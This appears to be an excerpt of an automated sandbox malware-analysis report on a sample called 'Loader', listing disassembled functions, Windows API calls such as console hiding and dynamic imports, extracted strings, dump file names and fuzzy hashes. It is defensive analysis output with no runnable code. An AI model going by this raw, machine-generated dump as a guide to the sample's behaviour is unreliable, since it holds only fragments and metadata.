_, xrefs: 00432181
4, xrefs: 00432129
', xrefs: 00432229
<, xrefs: 00432139
A, xrefs: 00432191
S, xrefs: 0043202F
8, xrefs: 00432149
I, xrefs: 004321D1
H, xrefs: 00432048
M, xrefs: 004321F1
0, xrefs: 0043231B
], xrefs: 00432171
U, xrefs: 00432131
+, xrefs: 00432279
E, xrefs: 004321B1

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: $"$"$'$'$*$+$+$/$0$4$6$8$:$<$=$=$A$C$E$G$H$I$I$K$M$M$O$O$Q$S$S$U$W$Y$[$]$_$i$k$m$o
API String ID: 2525500382-871300800
Opcode ID: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
Instruction ID: 865d247f53da1c212b644144c37fe5ba321bca7ef231fb23b2e03194a57c13c3
Opcode Fuzzy Hash: e45984be38196b5c8ff72e5588430cd25e3479d51ec099cdc983a58aa1c9b1d2
Instruction Fuzzy Hash: 5C91E76110C7C18DE3368638885879BBED11BA7218F188A9DD1ED8B2D3C6BA454AC767

Function 00431512 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 97COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043151C
VariantInit.OLEAUT32 ref: 0043152F

Strings

t, xrefs: 00431561
w, xrefs: 00431557
p, xrefs: 004315A7
~, xrefs: 00431575
n, xrefs: 0043157F
p, xrefs: 004315BB
a, xrefs: 0043156B
g, xrefs: 0043159D
s, xrefs: 0043154D
Z, xrefs: 00431593
c, xrefs: 004315B1
{, xrefs: 00431589

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Z$a$c$g$n$p$p$s$t$w${$~
API String ID: 2610073882-3241135356
Opcode ID: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
Instruction ID: 5cfd81fbbfab52470edc20309123d5fdb3929ff031e16fa1184257613a9df237
Opcode Fuzzy Hash: e4bafa1799fc74d6fdec72762fe4337596049604b772f4dce9c6462e0ef1b261
Instruction Fuzzy Hash: 56412A7550D3C0CAE366CB28C49878FBFE26BD6308F58885CE5C50B396D6BA9509C763

Function 004329CE Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 94COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32 ref: 004329F3

Strings

Z, xrefs: 00432A57
n, xrefs: 00432A43
w, xrefs: 00432A1B
p, xrefs: 00432A6B
~, xrefs: 00432A39
a, xrefs: 00432A2F
c, xrefs: 00432A75
p, xrefs: 00432A7F
s, xrefs: 00432A11
g, xrefs: 00432A61
t, xrefs: 00432A25
{, xrefs: 00432A4D

Memory Dump Source

Source File: 00000003.00000002.2234503218.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitVariant
String ID: Z$a$c$g$n$p$p$s$t$w${$~
API String ID: 1927566239-3241135356
Opcode ID: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
Instruction ID: 5e74e55bfebdbfff89dcf67c6b6cd9f6728498efe2e3599b3f27d88dd375cd61
Opcode Fuzzy Hash: 75c46943b2651eac38ca81ac704b743c7024d952c1a77a819c42d2055e78dec7
Instruction Fuzzy Hash: 9D414F7150D3C0CEE366CB28C49874BBFE25BD6308F49889DE5C44B396C6BA9509C763

Function 00A8AAE2 Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,7FFFFFFF,?,00A8AACD,?,?,?,?,?,?,?,?,?,?), ref: 00A8AB88
__alloca_probe_16.LIBCMT ref: 00A8AC43
__alloca_probe_16.LIBCMT ref: 00A8ACD2
__freea.LIBCMT ref: 00A8AD1D
__freea.LIBCMT ref: 00A8AD23
__freea.LIBCMT ref: 00A8AD59
__freea.LIBCMT ref: 00A8AD5F
__freea.LIBCMT ref: 00A8AD6F

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
Instruction ID: 11e5b0f80727d720d7a681db30d0104bce72141b0221337bb37e214791b2014c
Opcode Fuzzy Hash: faba2e0aeb08988ce597c14e0d18844319d8186c25003ae25296770dfa04f0e8
Instruction Fuzzy Hash: 1571D4729006099BEF21BFA48D41BAF77B6EF65710F144057E905E7191E7759C00C7A2

Function 00A6FE29 Relevance: 12.2, APIs: 8, Instructions: 177COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00A6FE70
__alloca_probe_16.LIBCMT ref: 00A6FE9C
MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00A6FEDB
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A6FEF8
LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A6FF37
__alloca_probe_16.LIBCMT ref: 00A6FF54
LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A6FF96
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00A6FFB9

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
Instruction ID: 787545d4c174d215d3a2d29993570a68daf91bba26b3e29d2483b683c2b4d487
Opcode Fuzzy Hash: 65acbc42aff8fefa1656c38171950527f6def969f1c50ab97b060a9f33e328e2
Instruction Fuzzy Hash: 10519E7260021AAFEB209F64EC45FAB7BB9EF41754F24443AF914DA1A0DB71DC11CB50

Function 00A7EE76 Relevance: 10.8, APIs: 7, Instructions: 329COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00A7EEFC

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction ID: eb7bc9b13de82987534d16cd792a0e483e4477f9a58ecb627fbf7690d8c64da0
Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
Instruction Fuzzy Hash: 4DB13A72A00395AFDB15CF64CC81BAE7BA5EF59310F14C1A5E948AB382E774DE01C7A0

Function 00A70D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A70D77
___except_validate_context_record.LIBVCRUNTIME ref: 00A70D7F
_ValidateLocalCookies.LIBCMT ref: 00A70E08
__IsNonwritableInCurrentImage.LIBCMT ref: 00A70E33
_ValidateLocalCookies.LIBCMT ref: 00A70E88

Strings

csm, xrefs: 00A70E1D

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ff69c728863583f3305d48ef47d0c3244be0d9d10ddca35e46beaca276af3789
Instruction ID: d65053e9085c23ba8ef7f951131a3bc03213f1e5412165dba6542176dbc66257
Opcode Fuzzy Hash: ff69c728863583f3305d48ef47d0c3244be0d9d10ddca35e46beaca276af3789
Instruction Fuzzy Hash: 8441C470A00218EBCF10DF68CC44E9E7BB5AF44314F14C565E91C9B352D735AD11CB91

Function 00A624B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON

Download Yara Rule

APIs

GetConsoleWindow.KERNEL32 ref: 00A624DD
ShowWindow.USER32(00000000,00000000), ref: 00A624E6
GetCurrentThreadId.KERNEL32 ref: 00A62524

Part of subcall function 00A6F11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,00A6253A,?,?,00000000), ref: 00A6F129
Part of subcall function 00A6F11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,00A6253A,?,?,00000000), ref: 00A6F142
Part of subcall function 00A6F11D: CloseHandle.KERNEL32(?,?,?,00A6253A,?,?,00000000), ref: 00A6F154

std::_Throw_Cpp_error.LIBCPMT ref: 00A62567
std::_Throw_Cpp_error.LIBCPMT ref: 00A62578
std::_Throw_Cpp_error.LIBCPMT ref: 00A62589
std::_Throw_Cpp_error.LIBCPMT ref: 00A6259A

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
String ID:
API String ID: 3956949563-0
Opcode ID: 32fa039e52c1481b5fc518587154435257540382eea760bd2ca77a920abdf109
Instruction ID: 29c4f45dba6ae7a393e4c049b3eb0e53760638dce8611630b34c9950a54ab5d2
Opcode Fuzzy Hash: 32fa039e52c1481b5fc518587154435257540382eea760bd2ca77a920abdf109
Instruction Fuzzy Hash: 4D21A6F2D402159BDF10EFE4DD06BDEBBB8AF04710F080125F508BA291E7B6A554CBA2

Function 00A7CF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,00A7D01A,00A61170,00A6AA08,?,?), ref: 00A7CFCC

Strings

ext-ms-, xrefs: 00A7CF76
api-ms-, xrefs: 00A7CF62

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
Instruction ID: a035bb5aa3fb1a46ed4adbaf03e2693470cd42fc26d412159a623982b854405f
Opcode Fuzzy Hash: 53f9f9bcd6beefac87cea917f67799473b82397b6e24dba9fc1eaecf5712e1f0
Instruction Fuzzy Hash: 22210A32B01311ABCB21DBA5DC41A5A776AEF417B0F25C11AF91EE7290DB30ED01C6D0

Function 00A70080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00A70086
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00A70094
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00A700A5

Strings

GetTempPath2W, xrefs: 00A7009A
kernel32.dll, xrefs: 00A70081
GetSystemTimePreciseAsFileTime, xrefs: 00A7008E

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1047828073
Opcode ID: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
Instruction ID: 55d2eb0944562f44c71735abc53541cb09506e6767333cdc5eb24fbb20b2493d
Opcode Fuzzy Hash: 9bbeeed27703f8d5414faa8f3fbfb7decbdd986c37e7485e911a747012ce3ad9
Instruction Fuzzy Hash: 5FD09E327456107B8B11DFF87C0D99A3AF9FE097123018953F545D2250DE7049028654

Function 00A84F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71315ed5b340ecf7c63204546eb2f78f00b35c1db1b905aba7acef9299d7f454
Instruction ID: f889dceaffeddcf834b886162409c225d62adc01dc9479db5e742a8249d27a29
Opcode Fuzzy Hash: 71315ed5b340ecf7c63204546eb2f78f00b35c1db1b905aba7acef9299d7f454
Instruction Fuzzy Hash: 4BB1F374E04A49AFDB11EFB8CD80BADBBB1BF45304F148159F9049B292DB719D42CBA0

Function 00A69B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00A69C97
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CA8
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CBC
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CDD
std::_Throw_Cpp_error.LIBCPMT ref: 00A69CEE
std::_Throw_Cpp_error.LIBCPMT ref: 00A69D06

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_
String ID:
API String ID: 2134207285-0
Opcode ID: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
Instruction ID: 2986e33cfc5d2197ecf166a884487921be5f6d9d35d5450ec26dff1ab1986b1c
Opcode Fuzzy Hash: 3e45838885fe72069fb55c78d5db3d075a26689a20c9ad07a17d23db2859e61d
Instruction Fuzzy Hash: B841D2B5900740CFDB30DB648A027AFB7F8AF45720F18062DE57A6A2D1D771A944CBA2

Function 00A7ACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A7ACDE,00A70760,00A6B77F,BB40E64E,?,?,?,?,00A8BFCA,000000FF), ref: 00A7ACF5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A7AD03
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A7AD1C
SetLastError.KERNEL32(00000000,?,00A7ACDE,00A70760,00A6B77F,BB40E64E,?,?,?,?,00A8BFCA,000000FF), ref: 00A7AD6E

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 2e18fe598e9460c25c93ce1cacc045ed7a77a08e96545fcdb7b1fe5af844c6f8
Instruction ID: f593dbdb730d3a467935ff141c0dabc0b915a7cab33bf6af1506bfcfe99c68f6
Opcode Fuzzy Hash: 2e18fe598e9460c25c93ce1cacc045ed7a77a08e96545fcdb7b1fe5af844c6f8
Instruction Fuzzy Hash: DC01283232A615BEBB3437B47D85A6E2794EB51FB6720C22BF61C445F2EF114C039251

Function 00A7B56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00A7B68D
CallUnexpected.LIBVCRUNTIME ref: 00A7B906

Strings

csm, xrefs: 00A7B6C4
csm, xrefs: 00A7B618
csm, xrefs: 00A7B5AB

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 5d73bcb8efd0a2a17f9a8e7ed2bbae9e9a6fd8fccf004fa0c2c1b271d5f70e01
Instruction ID: da6554835e79643d8ef67698ec85b8e3bd82f00eb2f393e9b9202f50b7e08e26
Opcode Fuzzy Hash: 5d73bcb8efd0a2a17f9a8e7ed2bbae9e9a6fd8fccf004fa0c2c1b271d5f70e01
Instruction Fuzzy Hash: 69B17BB1810209EFCF15DFA4CD81AAEB7B9BF54310F10C55AF9196B212D731DA61CBA2

Function 00A6BE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON

Download Yara Rule

APIs

std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6BF44
std::_Ref_count_base::_Decref.LIBCPMT ref: 00A6C028

Strings

MOC, xrefs: 00A6BE9F
csm, xrefs: 00A6BEB7
RCC, xrefs: 00A6BEAB

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: DecrefRef_count_base::_std::_
String ID: MOC$RCC$csm
API String ID: 1456557076-2671469338
Opcode ID: 57025f3721cb908a8ba8b356ea9a3894314907347c22dd39202feb10ac1d29ac
Instruction ID: 995849ce19085f9cebc3838a686c158f25b465363003b5a1e88ca751040c8dd6
Opcode Fuzzy Hash: 57025f3721cb908a8ba8b356ea9a3894314907347c22dd39202feb10ac1d29ac
Instruction Fuzzy Hash: 3441BF74910205DFCF28DF68CA459AEB7B9BF58300B58805DE449E7662C734EA84CF61

Function 00A755C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00A8BE94,000000FF,?,00A75685,00A7556C,?,00A75721,00000000), ref: 00A755F9
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A7560B
FreeLibrary.KERNEL32(00000000,?,?,00000000,00A8BE94,000000FF,?,00A75685,00A7556C,?,00A75721,00000000), ref: 00A7562D

Strings

mscoree.dll, xrefs: 00A755F2
CorExitProcess, xrefs: 00A75603

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
Instruction ID: eefcc7210dd4e8a402ff685ddd373c8c69b006b1ac175ec58baa60323affb04f
Opcode Fuzzy Hash: ed6fe54501dfe6df9cc461f9b4d3138f08fc0ba36553a3893d8638b531f1e4ca
Instruction Fuzzy Hash: 94016231B50659AFDB11CF94DC09BAEBBF8FF04B15F044526F811A6690DFB49901CA94

Function 00A7D6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00A7D76F
__alloca_probe_16.LIBCMT ref: 00A7D838
__freea.LIBCMT ref: 00A7D89F

Part of subcall function 00A7BF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,00A6A67D,00000018,?,00A63D4A,00000018,00000000), ref: 00A7BF43

__freea.LIBCMT ref: 00A7D8B2
__freea.LIBCMT ref: 00A7D8BF

Memory Dump Source

Source File: 00000003.00000002.2234694107.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true

Associated: 00000003.00000002.2234677127.0000000000A60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234715540.0000000000A8D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234735490.0000000000A9A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234750484.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234764781.0000000000AA2000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.2234796994.0000000000AEE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_a60000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
